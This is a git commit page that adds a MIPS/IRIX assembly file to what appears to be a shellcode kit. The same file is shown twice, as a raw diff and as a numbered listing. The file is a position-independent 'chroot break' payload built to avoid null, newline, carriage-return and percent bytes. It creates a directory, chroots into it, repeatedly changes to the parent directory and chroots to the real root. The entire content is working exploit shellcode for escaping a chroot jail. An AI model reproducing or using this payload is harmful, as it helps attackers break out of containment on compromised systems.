initial

author: Root THC 2026-02-24 12:42:47 +0000
committer: Root THC 2026-02-24 12:42:47 +0000
commit: c9cbeced5b3f2bdd7407e29c0811e65954132540 (patch)
tree: aefc355416b561111819de159ccbd86c3004cf88 /other/shellkit/mips_irix/chroot.s
parent: 073fe4bf9fca6bf40cef2886d75df832ef4b6fca (diff)
1 files changed, 60 insertions, 0 deletions
diff --git a/other/shellkit/mips_irix/chroot.s b/other/shellkit/mips_irix/chroot.s
new file mode 100644
index 0000000..96a1595
--- /dev/null
+++ b/other/shellkit/mips_irix/chroot.s
@@ -0,0 +1,60 @@
+/* MIPS/IRIX PIC chroot break
+ * without 0x00, 0x0a, 0x0d, 0x25
+ *
+ * -sc.
+ */
+#include <sgidefs.h>
+#include <sys/regdef.h>
+#include <sys/asm.h>
+#include <sys.s>
+#include <sys/syscall.h>
+        .section .text
+        .globl  cbegin
+        .globl  cend
+cbegin:
+        .set    noreorder
+        .set    nomacro
+foo:    bltzal  zero, foo
+        li      a1, 0700        /* a1 = 0700 permission */
+        /* mkdir ("Y..", 0700);
+         */
+        lui     t2, 0x592e
+        ori     t2, 0x2cff      /* t1 = "Y..\x00" */
+        add     t2, t2, 0x0101
+        sw      t2, -48(ra)
+        subu    a0, ra, 48      /* a0 = "Y.." */
+        li      v0, SYS_mkdir   /* 0x0438 */
+        syscall
+        /* chroot ("Y..");
+         * a0 still points to it
+         */
+        addu    v0, a1, (SYS_chroot - 0700)     /* v0 = SYS_chroot (0x0425) */
+        syscall
+        /* chdir ("..") a few times
+         */
+        li      s2, 0x1211      /* 12 times chdir ("..") */
+foo2:   subu    a0, ra, 47      /* "..\x00" */
+        li      v0, SYS_chdir   /* 0x03f4 */
+        syscall
+        sub     s2, 0x0101
+        bgez    s2, foo2
+        addu    v0, s2, 0x0426  /* bds: SYS_chroot (0x0425) + 1 */
+        subu    a0, ra, 46      /* ".\x00" */
+        syscall
+        li      t2, 0x7350      /* NOP */
+        .end    cbegin
+cend:
+        nop
author	Root THC	2026-02-24 12:42:47 +0000
committer	Root THC	2026-02-24 12:42:47 +0000
commit	c9cbeced5b3f2bdd7407e29c0811e65954132540 (patch)
tree	aefc355416b561111819de159ccbd86c3004cf88 /other/shellkit/mips_irix/chroot.s
parent	073fe4bf9fca6bf40cef2886d75df832ef4b6fca (diff)

diff --git a/other/shellkit/mips_irix/chroot.s b/other/shellkit/mips_irix/chroot.s new file mode 100644 index 0000000..96a1595 --- /dev/null +++ b/other/shellkit/mips_irix/chroot.s
@@ -0,0 +1,60 @@
	1	/* MIPS/IRIX PIC chroot break
	2	* without 0x00, 0x0a, 0x0d, 0x25
	3	*
	4	* -sc.
	5	*/
	6
	7	#include <sgidefs.h>
	8	#include <sys/regdef.h>
	9	#include <sys/asm.h>
	10	#include <sys.s>
	11	#include <sys/syscall.h>
	12
	13	.section .text
	14
	15	.globl cbegin
	16	.globl cend
	17
	18	cbegin:
	19	.set noreorder
	20	.set nomacro
	21
	22	foo: bltzal zero, foo
	23	li a1, 0700 /* a1 = 0700 permission */
	24
	25	/* mkdir ("Y..", 0700);
	26	*/
	27	lui t2, 0x592e
	28	ori t2, 0x2cff /* t1 = "Y..\x00" */
	29	add t2, t2, 0x0101
	30	sw t2, -48(ra)
	31
	32	subu a0, ra, 48 /* a0 = "Y.." */
	33	li v0, SYS_mkdir /* 0x0438 */
	34	syscall
	35
	36	/* chroot ("Y..");
	37	* a0 still points to it
	38	*/
	39	addu v0, a1, (SYS_chroot - 0700) /* v0 = SYS_chroot (0x0425) */
	40	syscall
	41
	42	/* chdir ("..") a few times
	43	*/
	44	li s2, 0x1211 /* 12 times chdir ("..") */
	45
	46	foo2: subu a0, ra, 47 /* "..\x00" */
	47	li v0, SYS_chdir /* 0x03f4 */
	48	syscall
	49	sub s2, 0x0101
	50	bgez s2, foo2
	51
	52	addu v0, s2, 0x0426 /* bds: SYS_chroot (0x0425) + 1 */
	53	subu a0, ra, 46 /* ".\x00" */
	54	syscall
	55	li t2, 0x7350 /* NOP */
	56
	57	.end cbegin
	58	cend:
	59	nop
	60